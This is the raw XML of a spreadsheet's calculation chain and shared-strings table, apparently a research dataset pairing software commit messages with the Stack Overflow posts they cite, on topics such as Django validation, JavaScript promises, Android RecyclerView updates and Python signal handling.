  <c r="C1554" i="1" s="1"/>
  <c r="C1555" i="1" s="1"/>
  <c r="C1556" i="1" s="1"/>
  <c r="C1557" i="1" s="1"/>
  <c r="C1558" i="1" s="1"/>
  <c r="C1559" i="1" s="1"/>
  <c r="C1560" i="1" s="1"/>
  <c r="C1561" i="1" s="1"/>
  <c r="C1562" i="1" s="1"/>
  <c r="C1563" i="1" s="1"/>
  <c r="C1564" i="1" s="1"/>
  <c r="C1565" i="1" s="1"/>
  <c r="C1566" i="1" s="1"/>
  <c r="C1567" i="1" s="1"/>
  <c r="C1568" i="1" s="1"/>
  <c r="C1569" i="1" s="1"/>
  <c r="C1570" i="1" s="1"/>
  <c r="C1571" i="1" s="1"/>
  <c r="C1572" i="1" s="1"/>
  <c r="C1573" i="1" s="1"/>
  <c r="C1574" i="1" s="1"/>
  <c r="C1575" i="1" s="1"/>
  <c r="C1576" i="1" s="1"/>
  <c r="C1577" i="1" s="1"/>
  <c r="C1578" i="1" s="1"/>
  <c r="C1579" i="1" s="1"/>
  <c r="C1580" i="1" s="1"/>
  <c r="C1581" i="1" s="1"/>
  <c r="C1582" i="1" s="1"/>
  <c r="C1583" i="1" s="1"/>
  <c r="C1584" i="1" s="1"/>
  <c r="C1585" i="1" s="1"/>
  <c r="C1586" i="1" s="1"/>
  <c r="C1587" i="1" s="1"/>
  <c r="C1588" i="1" s="1"/>
  <c r="C1589" i="1" s="1"/>
  <c r="C1590" i="1" s="1"/>
  <c r="C1591" i="1" s="1"/>
  <c r="C1592" i="1" s="1"/>
  <c r="C1593" i="1" s="1"/>
  <c r="C1594" i="1" s="1"/>
  <c r="C1595" i="1" s="1"/>
  <c r="C1596" i="1" s="1"/>
  <c r="C1597" i="1" s="1"/>
  <c r="C1598" i="1" s="1"/>
  <c r="C1599" i="1" s="1"/>
  <c r="C1600" i="1" s="1"/>
  <c r="C1601" i="1" s="1"/>
  <c r="C1602" i="1" s="1"/>
  <c r="C1603" i="1" s="1"/>
  <c r="C1604" i="1" s="1"/>
  <c r="C1605" i="1" s="1"/>
  <c r="C1606" i="1" s="1"/>
  <c r="C1607" i="1" s="1"/>
  <c r="C1608" i="1" s="1"/>
  <c r="C1609" i="1" s="1"/>
  <c r="C1610" i="1" s="1"/>
  <c r="C1611" i="1" s="1"/>
  <c r="C1612" i="1" s="1"/>
  <c r="C1613" i="1" s="1"/>
  <c r="C1614" i="1" s="1"/>
  <c r="C1615" i="1" s="1"/>
  <c r="C1616" i="1" s="1"/>
  <c r="C1617" i="1" s="1"/>
  <c r="C1618" i="1" s="1"/>
  <c r="C1619" i="1" s="1"/>
  <c r="C1620" i="1" s="1"/>
  <c r="C1621" i="1" s="1"/>
  <c r="C1622" i="1" s="1"/>
  <c r="C1623" i="1" s="1"/>
  <c r="C1624" i="1" s="1"/>
  <c r="C1625" i="1" s="1"/>
  <c r="C1626" i="1" s="1"/>
  <c r="C1627" i="1" s="1"/>
  <c r="C1628" i="1" s="1"/>
  <c r="C1629" i="1" s="1"/>
  <c r="C1630" i="1" s="1"/>
  <c r="C1631" i="1" s="1"/>
  <c r="C1632" i="1" s="1"/>
  <c r="C1633" i="1" s="1"/>
  <c r="C1634" i="1" s="1"/>
  <c r="C1635" i="1" s="1"/>
  <c r="C1636" i="1" s="1"/>
  <c r="C1637" i="1" s="1"/>
  <c r="C1638" i="1" s="1"/>
  <c r="C1639" i="1" s="1"/>
  <c r="C1640" i="1" s="1"/>
  <c r="C1641" i="1" s="1"/>
  <c r="C1642" i="1" s="1"/>
  <c r="C1643" i="1" s="1"/>
  <c r="C1644" i="1" s="1"/>
  <c r="C1645" i="1" s="1"/>
  <c r="C1646" i="1" s="1"/>
  <c r="C1647" i="1" s="1"/>
  <c r="C1648" i="1" s="1"/>
  <c r="C1649" i="1" s="1"/>
  <c r="C1650" i="1" s="1"/>
  <c r="C1651" i="1" s="1"/>
  <c r="C1652" i="1" s="1"/>
  <c r="C1653" i="1" s="1"/>
  <c r="C1654" i="1" s="1"/>
  <c r="C1655" i="1" s="1"/>
  <c r="C1656" i="1" s="1"/>
  <c r="C1657" i="1" s="1"/>
  <c r="C1658" i="1" s="1"/>
  <c r="C1659" i="1" s="1"/>
  <c r="C1660" i="1" s="1"/>
  <c r="C1661" i="1" s="1"/>
  <c r="C1662" i="1" s="1"/>
  <c r="C1663" i="1" s="1"/>
  <c r="C1664" i="1" s="1"/>
  <c r="C1665" i="1" s="1"/>
  <c r="C1666" i="1" s="1"/>
  <c r="C1667" i="1" s="1"/>
  <c r="C1668" i="1" s="1"/>
  <c r="C1669" i="1" s="1"/>
  <c r="C1670" i="1" s="1"/>
  <c r="C1671" i="1" s="1"/>
  <c r="C1672" i="1" s="1"/>
  <c r="C1673" i="1" s="1"/>
  <c r="C1674" i="1" s="1"/>
  <c r="C1675" i="1" s="1"/>
  <c r="C1676" i="1" s="1"/>
  <c r="C1677" i="1" s="1"/>
  <c r="C1678" i="1" s="1"/>
  <c r="C1679" i="1" s="1"/>
  <c r="C1680" i="1" s="1"/>
  <c r="C1681" i="1" s="1"/>
  <c r="C1682" i="1" s="1"/>
  <c r="C1683" i="1" s="1"/>
  <c r="C1684" i="1" s="1"/>
  <c r="C1685" i="1" s="1"/>
  <c r="C1686" i="1" s="1"/>
  <c r="C1687" i="1" s="1"/>
  <c r="C1688" i="1" s="1"/>
  <c r="C1689" i="1" s="1"/>
  <c r="C1690" i="1" s="1"/>
  <c r="C1691" i="1" s="1"/>
  <c r="C1692" i="1" s="1"/>
  <c r="C1693" i="1" s="1"/>
  <c r="C1694" i="1" s="1"/>
  <c r="C1695" i="1" s="1"/>
  <c r="C1696" i="1" s="1"/>
  <c r="C1697" i="1" s="1"/>
  <c r="C1698" i="1" s="1"/>
  <c r="C1699" i="1" s="1"/>
  <c r="C1700" i="1" s="1"/>
  <c r="C1701" i="1" s="1"/>
  <c r="C1702" i="1" s="1"/>
  <c r="C1703" i="1" s="1"/>
  <c r="C1704" i="1" s="1"/>
  <c r="C1705" i="1" s="1"/>
  <c r="C1706" i="1" s="1"/>
  <c r="C1707" i="1" s="1"/>
  <c r="C1708" i="1" s="1"/>
  <c r="C1709" i="1" s="1"/>
  <c r="C1710" i="1" s="1"/>
  <c r="C1711" i="1" s="1"/>
  <c r="C1712" i="1" s="1"/>
  <c r="C1713" i="1" s="1"/>
  <c r="C1714" i="1" s="1"/>
  <c r="C1715" i="1" s="1"/>
  <c r="C1716" i="1" s="1"/>
  <c r="C1717" i="1" s="1"/>
  <c r="C1718" i="1" s="1"/>
  <c r="C1719" i="1" s="1"/>
  <c r="C1720" i="1" s="1"/>
  <c r="C1721" i="1" s="1"/>
  <c r="C1722" i="1" s="1"/>
  <c r="C1723" i="1" s="1"/>
  <c r="C1724" i="1" s="1"/>
  <c r="C1725" i="1" s="1"/>
  <c r="C1726" i="1" s="1"/>
  <c r="C1727" i="1" s="1"/>
  <c r="C1728" i="1" s="1"/>
  <c r="C1729" i="1" s="1"/>
  <c r="C1730" i="1" s="1"/>
  <c r="C1731" i="1" s="1"/>
  <c r="C1732" i="1" s="1"/>
  <c r="C1733" i="1" s="1"/>
  <c r="C1734" i="1" s="1"/>
  <c r="C1735" i="1" s="1"/>
  <c r="C1736" i="1" s="1"/>
  <c r="C1737" i="1" s="1"/>
  <c r="C1738" i="1" s="1"/>
  <c r="C1739" i="1" s="1"/>
  <c r="C1740" i="1" s="1"/>
  <c r="C1741" i="1" s="1"/>
  <c r="C1742" i="1" s="1"/>
  <c r="C1743" i="1" s="1"/>
  <c r="C1744" i="1" s="1"/>
  <c r="C1745" i="1" s="1"/>
  <c r="C1746" i="1" s="1"/>
  <c r="C1747" i="1" s="1"/>
  <c r="C1748" i="1" s="1"/>
  <c r="C1749" i="1" s="1"/>
  <c r="C1750" i="1" s="1"/>
  <c r="C1751" i="1" s="1"/>
  <c r="C1752" i="1" s="1"/>
  <c r="C1753" i="1" s="1"/>
  <c r="C1754" i="1" s="1"/>
  <c r="C1755" i="1" s="1"/>
  <c r="C1756" i="1" s="1"/>
  <c r="C1757" i="1" s="1"/>
  <c r="C1758" i="1" s="1"/>
  <c r="C1759" i="1" s="1"/>
  <c r="C1760" i="1" s="1"/>
  <c r="C1761" i="1" s="1"/>
  <c r="C1762" i="1" s="1"/>
  <c r="C1763" i="1" s="1"/>
  <c r="C1764" i="1" s="1"/>
  <c r="C1765" i="1" s="1"/>
  <c r="C1766" i="1" s="1"/>
  <c r="C1767" i="1" s="1"/>
  <c r="C1768" i="1" s="1"/>
  <c r="C1769" i="1" s="1"/>
  <c r="C1770" i="1" s="1"/>
  <c r="C1771" i="1" s="1"/>
  <c r="C1772" i="1" s="1"/>
  <c r="C1773" i="1" s="1"/>
  <c r="C1774" i="1" s="1"/>
  <c r="C1775" i="1" s="1"/>
  <c r="C1776" i="1" s="1"/>
  <c r="C1777" i="1" s="1"/>
  <c r="C1778" i="1" s="1"/>
  <c r="C1779" i="1" s="1"/>
  <c r="C1780" i="1" s="1"/>
  <c r="C1781" i="1" s="1"/>
  <c r="C1782" i="1" s="1"/>
  <c r="C1783" i="1" s="1"/>
  <c r="C1784" i="1" s="1"/>
  <c r="C1785" i="1" s="1"/>
  <c r="C1786" i="1" s="1"/>
  <c r="C1787" i="1" s="1"/>
  <c r="C1788" i="1" s="1"/>
  <c r="C1789" i="1" s="1"/>
  <c r="C1790" i="1" s="1"/>
  <c r="C1791" i="1" s="1"/>
  <c r="C1792" i="1" s="1"/>
  <c r="C1793" i="1" s="1"/>
  <c r="C1794" i="1" s="1"/>
  <c r="C1795" i="1" s="1"/>
  <c r="C1796" i="1" s="1"/>
  <c r="C1797" i="1" s="1"/>
  <c r="C1798" i="1" s="1"/>
  <c r="C1799" i="1" s="1"/>
  <c r="C1800" i="1" s="1"/>
  <c r="C1801" i="1" s="1"/>
  <c r="C1802" i="1" s="1"/>
  <c r="C1803" i="1" s="1"/>
  <c r="C1804" i="1" s="1"/>
  <c r="C1805" i="1" s="1"/>
  <c r="C1806" i="1" s="1"/>
  <c r="C1807" i="1" s="1"/>
  <c r="C1808" i="1" s="1"/>
  <c r="C1809" i="1" s="1"/>
  <c r="C1810" i="1" s="1"/>
  <c r="C1811" i="1" s="1"/>
  <c r="C1812" i="1" s="1"/>
  <c r="C1813" i="1" s="1"/>
  <c r="C1814" i="1" s="1"/>
  <c r="C1815" i="1" s="1"/>
  <c r="C1816" i="1" s="1"/>
  <c r="C1817" i="1" s="1"/>
  <c r="C1818" i="1" s="1"/>
  <c r="C1819" i="1" s="1"/>
  <c r="C1820" i="1" s="1"/>
  <c r="C1821" i="1" s="1"/>
  <c r="C1822" i="1" s="1"/>
  <c r="C1823" i="1" s="1"/>
  <c r="C1824" i="1" s="1"/>
  <c r="C1825" i="1" s="1"/>
  <c r="C1826" i="1" s="1"/>
  <c r="C1827" i="1" s="1"/>
  <c r="C1828" i="1" s="1"/>
  <c r="C1829" i="1" s="1"/>
  <c r="C1830" i="1" s="1"/>
  <c r="C1831" i="1" s="1"/>
  <c r="C1832" i="1" s="1"/>
  <c r="C1833" i="1" s="1"/>
  <c r="C1834" i="1" s="1"/>
  <c r="C1835" i="1" s="1"/>
  <c r="C1836" i="1" s="1"/>
  <c r="C1837" i="1" s="1"/>
  <c r="C1838" i="1" s="1"/>
  <c r="C1839" i="1" s="1"/>
  <c r="C1840" i="1" s="1"/>
  <c r="C1841" i="1" s="1"/>
  <c r="C1842" i="1" s="1"/>
  <c r="C1843" i="1" s="1"/>
  <c r="C1844" i="1" s="1"/>
  <c r="C1845" i="1" s="1"/>
  <c r="C1846" i="1" s="1"/>
  <c r="C1847" i="1" s="1"/>
  <c r="C1848" i="1" s="1"/>
  <c r="C1849" i="1" s="1"/>
  <c r="C1850" i="1" s="1"/>
  <c r="C1851" i="1" s="1"/>
  <c r="C1852" i="1" s="1"/>
  <c r="C1853" i="1" s="1"/>
  <c r="C1854" i="1" s="1"/>
  <c r="C1855" i="1" s="1"/>
  <c r="C1856" i="1" s="1"/>
  <c r="C1857" i="1" s="1"/>
  <c r="C1858" i="1" s="1"/>
  <c r="C1859" i="1" s="1"/>
  <c r="C1860" i="1" s="1"/>
  <c r="C1861" i="1" s="1"/>
  <c r="C1862" i="1" s="1"/>
  <c r="C1863" i="1" s="1"/>
  <c r="C1864" i="1" s="1"/>
  <c r="C1865" i="1" s="1"/>
  <c r="C1866" i="1" s="1"/>
  <c r="C1867" i="1" s="1"/>
  <c r="C1868" i="1" s="1"/>
  <c r="C1869" i="1" s="1"/>
  <c r="C1870" i="1" s="1"/>
  <c r="C1871" i="1" s="1"/>
  <c r="C1872" i="1" s="1"/>
  <c r="C1873" i="1" s="1"/>
  <c r="C1874" i="1" s="1"/>
  <c r="C1875" i="1" s="1"/>
  <c r="C1876" i="1" s="1"/>
  <c r="C1877" i="1" s="1"/>
  <c r="C1878" i="1" s="1"/>
  <c r="C1879" i="1" s="1"/>
  <c r="C1880" i="1" s="1"/>
  <c r="C1881" i="1" s="1"/>
  <c r="C1882" i="1" s="1"/>
  <c r="C1883" i="1" s="1"/>
  <c r="C1884" i="1" s="1"/>
  <c r="C1885" i="1" s="1"/>
  <c r="C1886" i="1" s="1"/>
  <c r="C1887" i="1" s="1"/>
  <c r="C1888" i="1" s="1"/>
  <c r="C1889" i="1" s="1"/>
  <c r="C1890" i="1" s="1"/>
  <c r="C1891" i="1" s="1"/>
  <c r="C1892" i="1" s="1"/>
  <c r="C1893" i="1" s="1"/>
  <c r="C1894" i="1" s="1"/>
  <c r="C1895" i="1" s="1"/>
  <c r="C1896" i="1" s="1"/>
  <c r="C1897" i="1" s="1"/>
  <c r="C1898" i="1" s="1"/>
  <c r="C1899" i="1" s="1"/>
  <c r="C1900" i="1" s="1"/>
  <c r="C1901" i="1" s="1"/>
  <c r="C1902" i="1" s="1"/>
  <c r="C1903" i="1" s="1"/>
  <c r="C1904" i="1" s="1"/>
  <c r="C1905" i="1" s="1"/>
  <c r="C1906" i="1" s="1"/>
  <c r="C1907" i="1" s="1"/>
  <c r="C1908" i="1" s="1"/>
  <c r="C1909" i="1" s="1"/>
  <c r="C1910" i="1" s="1"/>
  <c r="C1911" i="1" s="1"/>
  <c r="C1912" i="1" s="1"/>
  <c r="C1913" i="1" s="1"/>
  <c r="C1914" i="1" s="1"/>
  <c r="C1915" i="1" s="1"/>
  <c r="C1916" i="1" s="1"/>
  <c r="C1917" i="1" s="1"/>
  <c r="C1918" i="1" s="1"/>
  <c r="C1919" i="1" s="1"/>
  <c r="C1920" i="1" s="1"/>
  <c r="C1921" i="1" s="1"/>
  <c r="C1922" i="1" s="1"/>
  <c r="C1923" i="1" s="1"/>
  <c r="C1924" i="1" s="1"/>
  <c r="C1925" i="1" s="1"/>
  <c r="C1926" i="1" s="1"/>
  <c r="C1927" i="1" s="1"/>
  <c r="C1928" i="1" s="1"/>
  <c r="C1929" i="1" s="1"/>
  <c r="C1930" i="1" s="1"/>
  <c r="C1931" i="1" s="1"/>
  <c r="C1932" i="1" s="1"/>
  <c r="C1933" i="1" s="1"/>
  <c r="C1934" i="1" s="1"/>
  <c r="C1935" i="1" s="1"/>
  <c r="C1936" i="1" s="1"/>
  <c r="C1937" i="1" s="1"/>
  <c r="C1938" i="1" s="1"/>
  <c r="C1939" i="1" s="1"/>
  <c r="C1940" i="1" s="1"/>
  <c r="C1941" i="1" s="1"/>
  <c r="C1942" i="1" s="1"/>
  <c r="C1943" i="1" s="1"/>
  <c r="C1944" i="1" s="1"/>
  <c r="C1945" i="1" s="1"/>
  <c r="C1946" i="1" s="1"/>
  <c r="C1947" i="1" s="1"/>
  <c r="C1948" i="1" s="1"/>
  <c r="C1949" i="1" s="1"/>
  <c r="C1950" i="1" s="1"/>
  <c r="C1951" i="1" s="1"/>
  <c r="C1952" i="1" s="1"/>
  <c r="C1953" i="1" s="1"/>
  <c r="C1954" i="1" s="1"/>
  <c r="C1955" i="1" s="1"/>
  <c r="C1956" i="1" s="1"/>
  <c r="C1957" i="1" s="1"/>
  <c r="C1958" i="1" s="1"/>
  <c r="C1959" i="1" s="1"/>
  <c r="C1960" i="1" s="1"/>
  <c r="C1961" i="1" s="1"/>
  <c r="C1962" i="1" s="1"/>
  <c r="C1963" i="1" s="1"/>
  <c r="C1964" i="1" s="1"/>
  <c r="C1965" i="1" s="1"/>
  <c r="C1966" i="1" s="1"/>
  <c r="C1967" i="1" s="1"/>
  <c r="C1968" i="1" s="1"/>
  <c r="C1969" i="1" s="1"/>
  <c r="C1970" i="1" s="1"/>
  <c r="C1971" i="1" s="1"/>
  <c r="C1972" i="1" s="1"/>
  <c r="C1973" i="1" s="1"/>
  <c r="C1974" i="1" s="1"/>
  <c r="C1975" i="1" s="1"/>
  <c r="C1976" i="1" s="1"/>
  <c r="C1977" i="1" s="1"/>
  <c r="C1978" i="1" s="1"/>
  <c r="C1979" i="1" s="1"/>
  <c r="C1980" i="1" s="1"/>
  <c r="C1981" i="1" s="1"/>
  <c r="C1982" i="1" s="1"/>
  <c r="C1983" i="1" s="1"/>
  <c r="C1984" i="1" s="1"/>
  <c r="C1985" i="1" s="1"/>
  <c r="C1986" i="1" s="1"/>
  <c r="C1987" i="1" s="1"/>
  <c r="C1988" i="1" s="1"/>
  <c r="C1989" i="1" s="1"/>
  <c r="C1990" i="1" s="1"/>
  <c r="C1991" i="1" s="1"/>
  <c r="C1992" i="1" s="1"/>
  <c r="C1993" i="1" s="1"/>
  <c r="C1994" i="1" s="1"/>
  <c r="C1995" i="1" s="1"/>
  <c r="C1996" i="1" s="1"/>
  <c r="C1997" i="1" s="1"/>
  <c r="C1998" i="1" s="1"/>
  <c r="C1999" i="1" s="1"/>
  <c r="C2000" i="1" s="1"/>
  <c r="C2001" i="1" s="1"/>
  <c r="C2002" i="1" s="1"/>
  <c r="C2003" i="1" s="1"/>
  <c r="C2004" i="1" s="1"/>
  <c r="C2005" i="1" s="1"/>
  <c r="C2006" i="1" s="1"/>
  <c r="C2007" i="1" s="1"/>
  <c r="C2008" i="1" s="1"/>
  <c r="C2009" i="1" s="1"/>
  <c r="C2010" i="1" s="1"/>
  <c r="C11" i="1"/>
  <c r="C12" i="1" s="1"/>
  <c r="C13" i="1" s="1"/>
  <c r="C14" i="1" s="1"/>
  <c r="C15" i="1" s="1"/>
  <c r="C16" i="1" s="1"/>
  <c r="C17" i="1" s="1"/>
  <c r="C18" i="1" s="1"/>
  <c r="C19" i="1" s="1"/>
  <c r="C20" i="1" s="1"/>
  <c r="C10" i="1"/>
  <c r="C8" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="6033" uniqueCount="3883">
  <si>
    <t>commit_id</t>
  </si>
  <si>
    <t>stage2_score</t>
  </si>
  <si>
    <t>stage2_rank</t>
  </si>
  <si>
    <t>C1</t>
  </si>
  <si>
    <t>Fix security group rule validation [SENTRY-3081]
See also:
* http://www.django-rest-framework.org/topics/3.0-announcement/#differences-between-modelserializer-validation-and-modelform
* https://stackoverflow.com/questions/32834026/why-does-django-rest-framework-discourage-model-level-validation</t>
  </si>
  <si>
    <t>There are two major issues with the model's "full_clean". The first one is technical. There are a couple of cases where the full_clean isn't called at all. For example, you'll bypass it when you do a queryset.update().
The second one is that if you have a complex business logic - which is usually why you'll have a full_clean - it's likely that you should do the validation in the business logic, not go down to the models to validate. Each layer should be responsible for its own consistency and the storage layer - ie models - shouldn't care about the business layer.
Another thing that I can think of is that full_clean will be called once you have a model that comes after the serializer has been doing its validation. At this point, things start getting messy because you have a two-step validation with an object created in between.
If you're using nested serializer, you might be stuck here because you won't be able to create nested models before the primary model has been saved which will make the full clean call even messier - some objects will be created, others will not. It's hard to figure out when and what object should be validated with their full_clean and you can be sure there'll be a lot of complaints from users when they'll override the update/clean and figure out the full_clean hasn't been called for every model. This started becoming a total headache and we prefer to keep things simpler and more explicit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When deploying a Windows EC2 instance with Terraform, I want to create a user using the User_Data template. I am also passing a random_password variable to the template.
In the main.tf I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;resource &amp;quot;random_password&amp;quot; &amp;quot;password&amp;quot; {
  length           = 16
  special          = true
}
resource &amp;quot;aws_instance&amp;quot; &amp;quot;webserver&amp;quot; {
  ami                         = data.aws_ami.WindowsServer2025.image_id
  instance_type               = &amp;quot;t3.micro&amp;quot;
  key_name                    = &amp;quot;deployer&amp;quot;
  subnet_id                   = aws_subnet.public_sn1.id
  associate_public_ip_address = true
  security_groups             = [aws_security_group.web_server_sg.id]
  user_data                   = templatefile(&amp;quot;New_User.tftpl&amp;quot;, { MYPASSWORD = random_password.password.result })
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For my New_User.tftpl I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;powershell&amp;gt;
New-LocalUser -Name User123 -Password  (${MYPASSWORD} | ConvertTo-SecureString -AsPlainText -Force)
Add-LocalGroupMember -Group &amp;quot;Administrators&amp;quot; -Member &amp;quot;User123&amp;quot;
&amp;lt;/powershell&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... the account is not created. Any idea where it might have gone wrong? thank you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solved:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Stupid, just missing quotes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;New-LocalUser -Name User123 -Password  (&amp;quot;${MYPASSWORD}&amp;quot; | ConvertTo-SecureString -AsPlainText -Force)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C10</t>
  </si>
  <si>
    <t>Return promise directly from copyMarkbindAsset
- Remove explicit promise construction anti-pattern:
https://stackoverflow.com/a/23803744</t>
  </si>
  <si>
    <t>The deferred antipattern (now explicit-construction anti-pattern) coined by Esailija is a common anti-pattern people who are new to promises make, I've made it myself when I first used promises. The problem with the above code is that is fails to utilize the fact that promises chain. Promises can chain with.then and you can return promises directly. Your code in getStuffDone
can be rewritten as: function getStuffDone(param){
    return myPromiseFn(param+1); // much nicer, right?
}
Promises are all about making asynchronous code more readable and behave like synchronous code without hiding that fact. Promises represent an abstraction over a value of one time operation, they abstract the notion of a statement or expression in a programming language.
You should only use deferred objects when you are
converting an API to promises
and can't do it automatically, or when you're writing aggregation functions that are easier expressed this way.
Quoting Esailija:
This is the most common anti-pattern. It is easy to fall into this when you don't really understand promises and think of them as glorified event emitters or callback utility. Let's recap: promises are about making asynchronous code retain most of the lost properties of synchronous code such as flat indentation and one exception channel.</t>
  </si>
  <si>
    <t xml:space="preserve">I curious to how different people solve integration of systems. I have a feeling that the last years more and more work has gone into integrating systems and that this kind of work need will increase as well.
I wondering if you solve it developing your own small services that are then connected or if you use some sort of product (WebSphere, BizTalk, [external-link] etc). I'd also think it'd be interesting to know how these kind of solutions are managed and maintained (how do you solve security, instrumentation etc, etc), what kind of problems have you experienced with your solution and so on.
</t>
  </si>
  <si>
    <t>C100</t>
  </si>
  <si>
    <t>Add subscription to MQTT broker and update recycler view with it
Subscription of the topics happens at the MainViewModel and for now
does break the MVI pattern. This is done due to the fact that observing
the topic is a constant state, while so far we have used MVI to do
one-shot calls that immediately respond with data or a fail response
and are done forever. I have not found a way to embed this observable
into the pattern so far, something to be taken into consideration later
down the line.
For now the subscription happens on main fragment initialization, and
does not check in any way later it the connection has been dropped or
not. In a future iteration the connection problems can be addressed. As
a temporary solution, it could be at least moved to a later stage of
the fragment's lifecycle so that it can re-subscribe along with
re-connecting to the MQTT broker when the screen is resumed (like after
the phone was locked for a bit).
As discussed here https://stackoverflow.com/a/50062174/9440211 we are
doing a "hacky" way of forcing the recycler view to update. We are
overriding submitList to fix problem with the new list being == to the
old list, which is true because we are also updating the local variable
whenever there is a change. We get around it by sending a copy of the
list which does not return true on the == operation and therefore
continues on the method and triggers the notifyDataSetChanged.</t>
  </si>
  <si>
    <t>The library assumes you are using Room or any other ORM which offers a new async list every time it gets updated, so just calling submitList on it will work, and for sloppy developers, it prevents doing the calculations twice if the same list is called.
The accepted answer is correct, it offers the explanation but not the solution.
What you can do in case you're not using any such libraries is:
submitList(null);
submitList(myList);
Another solution would be to override submitList (which doesn't cause that quick blink) as such:
@Override
public void submitList(final List&lt;Author&gt; list) {
    super.submitList(list != null ? new ArrayList&lt;&gt;(list) : null);
}
Or with Kotlin code:
override fun submitList(list: List&lt;CatItem&gt;?) {
    super.submitList(list?.let { ArrayList(it) })
}
Questionable logic but works perfectly. My preferred method is the second one because it doesn't cause each row to get an onBind call.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm just reading up on SOA and the service registry / UDDI get mentioned regularly. It sounds nice but how is used in reality?
Is the registry meant to decouple a logical service from its' physical implementation (port, url etc)? 
Is the registry meant to be browsed by a human looking for an interesting service to play with?
Would it be 'wrong' to hard-wire an
application
    to the services it uses?
</t>
  </si>
  <si>
    <t>C101</t>
  </si>
  <si>
    <t>(#30) Refactor worker for readability, extensibility &amp; configurability (
#31)
* (#30): Refactor worker for readability, extensibility &amp; configurability
Closes #30
* Refactor: Define WorkerManager &amp; GruntWorker
WorkerManager is the one who receives tasks and delegate them to its
GruntWorkers running in background. GruntWorker executes the tasks
and publish the result back to the queue. Both of these should implement
the Interface IWorker. The main logic for the worker is in the `_main_loop`.
* Refactor: pubsub client &amp; concurrency manager
In the future we want to enable users to configure and switch to
a different pubsub client &amp; concurrency manager if need be. We start
with Redis as default pubsub and multiprocessing as default concurrency
manager. Users should be able to configure these using envronment
variables.
* Use better interface
We use Protocols as interfaces for worker, pubsub, concurrency manager
* Refactor: Use pytest fixture for worker
* Fix warning &amp; zombie child procs on sigterm/sigkill
Before, `./test.sh &amp;&amp; pidof $(which python)` after `./test.sh`
will give a list of pids which means we are not properly
killing child processes.
With this this change, we do not see zombie child processes
anymore.
We fix this making sure the worker manager handle TERM &amp; INT signals
and propagate it to the workers.
Some helpful references regarding handling signals:
* https://stackoverflow.com/questions/42628795/indirectly-stopping-a-python-asyncio-event-loop-through-sigterm-has-no-effect
* https://stackoverflow.com/questions/67823770/how-to-propagate-sigterm-to-children-created-via-subprocess</t>
  </si>
  <si>
    <t>One solution is to explicitly throw SystemExit from a.py
#!/usr/bin/env python3
# a.py
import signal
import subprocess
import os
def cleanup(signum, frame):
    raise SystemExit(signum)
def main():
    signal.signal(signal.SIGINT, cleanup)
    signal.signal(signal.SIGTERM, cleanup)
    print('Starting process {}'.format(os.getpid()))
    subprocess.check_call('./b.py')
if __name__ == '__main__':
    main()
Alternatively you can start the process with Popen and call Popen.send_signal to the child process when parent exits.
EDIT:
I've done some reading on the topic and it's an expected behaviour. kill -15 &lt;pid&gt; sends the signal to the specified process and only this one, the signal is not supposed to be propagated. However, you can send a signal to the process group which will kill all children as well. The syntax is kill -15 -&lt;pgid&gt; (note extra dash). The process group id is typically the same as the leader process id.</t>
  </si>
  <si>
    <t>The following minimal program reproduces the problem.
    import asyncio
    import signal
    class A:
        def __init__(self):
            self._event_loop = asyncio.new_event_loop()
        def run(self):
            print('starting event loop')
            self._event_loop.run_forever()
            print('event loop has stopped')
        def stop(self):
            print('stopping event loop')
            self._event_loop.stop()
    if __name__ == '__main__':
        a = A()
        def handle_term(*args):
            a.stop()
        signal.signal(signal.SIGTERM, handle_term)
        a.run()
If you run the program and send a SIGTERM to the process, the print statement in line 16 (stopping event loop) is called but the programm does not terminate and the print statement in line 13 (event loop has stopped) is never called. So it seems that the event loop is never stopped and `self._event_loop.run_forever()` blocks indefinitely.
Why is this?
Note: A modified version of the program, where `a.stop()` is not called by a signal handler but by a seperate thread with a delay, works as expected. How can it make a difference how `a.stop()` is called?
Instead of signal.signal() use loop.add_signal_handler():
import asyncio
import signal
import os
class A:
    def __init__(self):
        self.loop = asyncio.new_event_loop()
        self.loop.add_signal_handler(signal.SIGTERM, self.stop)
    def stop(self):
        print('stopping')
        self.loop.stop()
    def run(self, close=True):
        print('starting loop')
        try:
            self.loop.run_forever()
            print('loop stopped')
        finally:
            if close:
                self.loop.close()
if __name__ == '__main__':
    print("to stop run:\nkill -TERM {}".format(os.getpid()))
    a = A()
    a.run()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building an app in a CI/CD environment on a Mac host. As part of this build, I need to run a command that writes to &lt;code&gt;FileManager.SearchPathDirectory.applicationSupportDirectory&lt;/code&gt;, which is normally &lt;code&gt;/Users/username/Library/Application Support/&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The problem is that my build environment is a sandbox that prevents writing outside of &lt;code&gt;/tmp&lt;/code&gt;. In the sandbox, &lt;code&gt;$HOME&lt;/code&gt; is set to &lt;code&gt;/tmp&lt;/code&gt; which most unix-y commands use to put their config files relative to &lt;code&gt;$HOME&lt;/code&gt; (eg. &lt;code&gt;$HOME/.git&lt;/code&gt; or whatever). But any Mac app that puts its files in &lt;code&gt;FileManager.SearchPathDirectory.applicationSupportDirectory&lt;/code&gt; will not be relative to &lt;code&gt;$HOME&lt;/code&gt; (which is now &lt;code&gt;/tmp&lt;/code&gt;), it will be relative to &lt;code&gt;/Users/username/Library/Application Support&lt;/code&gt;, which will fail in the sandbox.&lt;/p&gt;
&lt;p&gt;On a Mac, how can I reconfigure &lt;code&gt;FileManager.SearchPathDirectory.applicationSupportDirectory&lt;/code&gt; to point to a directory on the &lt;code&gt;/tmp&lt;/code&gt; filesystem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C102</t>
  </si>
  <si>
    <t>Starting a mixin for ZstPlugs that will make it an extensible reacting plug with callbacks.
